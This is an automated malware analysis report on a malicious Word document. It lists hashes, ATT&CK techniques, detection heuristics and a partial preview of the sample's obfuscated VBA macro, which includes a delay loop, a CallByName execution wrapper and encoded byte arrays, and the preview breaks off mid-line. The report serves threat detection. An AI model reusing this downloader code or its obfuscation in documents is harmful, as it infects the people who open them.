Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4702be3f05227031…

MALICIOUS

Office (OLE)

85.5 KB Created: 2018-07-20 21:29:00 Authoring application: Microsoft Office Word First seen: 2019-10-30
MD5: fe7df3d223fb2632dd70e5d6af08f3e7 SHA-1: 52b367467797e173b8f173076bd3bef141ccf9af SHA-256: 4702be3f05227031f57cb1d7d48f6638b36b22690689d30744b1cdea138ffaa2
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing obfuscated VBA macros, as indicated by multiple heuristic firings including ClamAV's detection of macro obfuscation. The presence of `GetObject` and `CallByName` calls suggests dynamic execution of code. While the exact payload is not discernible due to obfuscation, the typical behavior for such documents is to download and execute a second-stage payload, hence the classification as a potential downloader.

Heuristics 5

  • ClamAV: Doc.Macro.Obfuscation-6663668-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6663668-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18328 bytes
SHA-256: e944f496728f426377211e3db20697013d2ee6897b00feda21641700f6343572
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim Xt5, Xt79(2) As Byte, Xt63(9) As Byte, Xt56(32) As Byte, Xt84(19) As Byte, Xt3(13) As Byte, Xt01(5) As Byte, Xt48(55) As Byte, Xt55(770) As Byte, Xt88(5) As Byte
Private Sub f_Layout()
If Xt5 = 0 Then
Xt5 = 59
Dim Xt06, Xt59
Xt59 = 36764888
While Xt06 <= Xt59
Xt06 = Xt06 + 1
Wend
If Xt06 - 1 = Xt59 Then
Xt24
End If
End If
End Sub
Private Sub Xt87()
Xt84(19) = 203
Xt84(11) = 100
Xt84(9) = 210
Xt84(2) = 178
Xt84(17) = 213
Xt84(16) = 39
Xt84(5) = 102
Xt84(6) = 192
Xt84(15) = 171
Xt84(18) = 11
Xt84(10) = 6
Xt84(14) = 102
Xt84(4) = 127
Xt84(7) = 15
Xt84(12) = 180
Xt84(3) = 232
Xt84(1) = 154
Xt84(0) = 24
Xt84(13) = 42
Xt84(8) = 216
End Sub
Private Function Xt7(Xt37, Xt95, Xt1, Xt9, Xt93, Xt16)
On Error GoTo Xt4
If Xt9 = 1 Then
CallByName Xt37, Xt95, Xt1, Xt93, Null, Xt16
Else
Set Xt7 = CallByName(Xt37, Xt95, Xt1, Xt93)
End If
Exit Function
Xt4:
End Function
Private Sub Xt90()
Xt63(9) = 198
Xt63(0) = 28
Xt63(4) = 26
Xt63(7) = 25
Xt63(1) = 155
Xt63(8) = 216
Xt63(6) = 254
Xt63(3) = 172
Xt63(5) = 80
Xt63(2) = 179
End Sub
Private Sub Xt83()
Xt56(11) = 120
Xt56(16) = 56
Xt56(12) = 179
Xt56(9) = 195
Xt56(23) = 132
Xt56(25) = 69
Xt56(28) = 140
Xt56(8) = 141
Xt56(7) = 14
Xt56(19) = 129
Xt56(18) = 76
Xt56(17) = 215
Xt56(0) = 56
Xt56(6) = 228
Xt56(27) = 66
Xt56(2) = 178
Xt56(10) = 12
Xt56(14) = 113
Xt56(30) = 200
Xt56(32) = 36
Xt56(1) = 154
Xt56(31) = 87
Xt56(15) = 163
Xt56(29) = 84
Xt56(4) = 42
Xt56(21) = 198
Xt56(20) = 253
Xt56(22) = 206
Xt56(13) = 37
Xt56(3) = 182
Xt56(5) = 84
Xt56(26) = 6
Xt56(24) = 55
End Sub
Private Sub Xt43()
Xt55(332) = 22
Xt55(725) = 206
Xt55(551) = 153
Xt55(739) = 68
Xt55(494) = 145
Xt55(591) = 56
Xt55(423) = 157
Xt55(768) = 101
Xt55(682) = 85
Xt55(46) = 63
Xt55(43) = 182
Xt55(728) = 34
Xt55(110) = 32
Xt55(35) = 253
Xt55(677) = 141
Xt55(178) = 244
Xt55(245) = 59
Xt55(491) = 86
Xt55(499) = 122
Xt55(270) = 151
Xt55(221) = 139
Xt55(21) = 238
Xt55(340) = 63
Xt55(358) = 18
Xt55(28) = 198
Xt55(488) = 236
Xt55(305) = 28
Xt55(363) = 169
Xt55(660) = 7
Xt55(310) = 120
Xt55(319) = 212
Xt55(529) = 156
Xt55(98) = 221
Xt55(207) = 127
Xt55(53) = 83
Xt55(387) = 141
Xt55(593) = 67
Xt55(565) = 71
Xt55(133) = 44
Xt55(560) = 175
Xt55(228) = 46
Xt55(602) = 197
Xt55(537) = 201
Xt55(121) = 241
Xt55(372) = 88
Xt55(437) = 255
Xt55(48) = 210
Xt55(5) = 111
Xt55(211) = 83
Xt55(263) = 134
Xt55(528) = 71
Xt55(407) = 62
Xt55(187) = 238
Xt55(611) = 194
Xt55(655) = 158
Xt55(258) = 61
Xt55(563) = 239
Xt55(330) = 94
Xt55(335) = 18
Xt55(620) = 209
Xt55(538) = 144
Xt55(450) = 130
Xt55(392) = 16
Xt55(73) = 235
Xt55(197) = 241
Xt55(724) = 36
Xt55(239) = 88
Xt55(501) = 243
Xt55(690) = 236
Xt55(441) = 228
Xt55(770) = 42
Xt55(734) = 104
Xt55(70) = 212
Xt55(378) = 250
Xt55(40) = 113
Xt55(533) = 235
Xt55(57) = 7
Xt55(295) = 139
Xt55(161) = 150
Xt55(251) = 239
Xt55(436) = 133
Xt55(652) = 130
Xt55(524) = 64
Xt55(408) = 229
Xt55(510) = 91
Xt55(615) = 105
Xt55(588) = 75
Xt55(246) = 20
Xt55(751) = 192
Xt55(742) = 249
Xt55(680) = 115
Xt55(69) = 76
Xt55(291) = 118
Xt55(589) = 209
Xt55(695) = 236
Xt55(238) = 199
Xt55(504) = 133
Xt55(723) = 187
Xt55(334) = 192
Xt55(106) = 240
Xt55(336) = 111
Xt55(37) = 168
Xt55(374) = 37
Xt55(469) = 164
Xt55(188) = 158
Xt55(116) = 211
Xt55(427) = 16
Xt55(19) = 134
Xt55(250) = 200
Xt55(675) = 223
Xt55(223) = 24
Xt55(658) = 5
Xt55(410) = 179
Xt55(349) = 250
Xt55(196) = 200
Xt55(397) = 37
Xt55(371) = 133
Xt55(463) = 135
Xt55(131) = 44
Xt55(612) = 154
Xt55(285) = 62
Xt55(4) = 98
Xt55(486) = 18
Xt55(160) = 251
Xt55(390) = 127
Xt55(44) = 108
Xt55(177) = 158
Xt55(85) = 249
Xt55(531) = 244
Xt55(483) = 233
Xt55(331) = 197
Xt55(230) = 
... (truncated)